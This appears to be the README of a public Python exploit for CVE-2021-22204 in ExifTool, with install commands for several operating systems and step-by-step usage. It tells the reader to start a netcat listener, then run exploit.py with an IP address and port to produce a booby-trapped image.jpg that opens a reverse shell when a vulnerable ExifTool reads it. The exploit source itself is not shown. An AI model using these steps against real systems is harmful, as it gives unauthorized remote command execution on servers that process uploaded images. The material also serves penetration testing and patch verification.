CVE-2021-22204-exiftool

Python exploit for the CVE-2021-22204 vulnerability in ExifTool.

Video tutorial

YouTube

    404 notfound

Requirements

python3 python3-pip djvulibre-bin exiftool

Install requirements

Debian

    apt-get install djvulibre-bin libimage-exiftool-perl python3 python3-pip

Ubuntu

    apt-get install djvulibre-bin libimage-exiftool-perl python3 python3-pip

Arch Linux

    pacman -S djvulibre perl-image-exiftool python python-pip

Kali Linux

    apt-get install djvulibre-bin libimage-exiftool-perl python3 python3-pip

Fedora

    dnf install djvulibre perl-Image-ExifTool python3 python3-pip

OS X

    brew install djvulibre exiftool python

Raspbian

    apt-get install djvulibre-bin libimage-exiftool-perl python3 python3-pip

How to run:

Install Python requirements

    sudo pip install -r requirements.txt

Start a listener for the reverse shell with netcat

    nc -nvlp 4444

Give execute permission

    chmod +x exploit.py

Run program

    python3 exploit.py {Your IP address} {Your listening port}

OR

    ./exploit.py {Your IP address} {Your listening port}

Example

    python3 exploit.py 192.168.0.1 4444

OR

    ./exploit.py 192.168.0.1 4444

The output file name is

    image.jpg

About the vulnerability

CVE-2021-22204 was discovered and reported by William Bowling (@wcbowling).

This exploit was made by studying the ExifTool patch after the CVE had already been reported.

The generated image.jpg triggers the vulnerability when it is opened with a vulnerable ExifTool.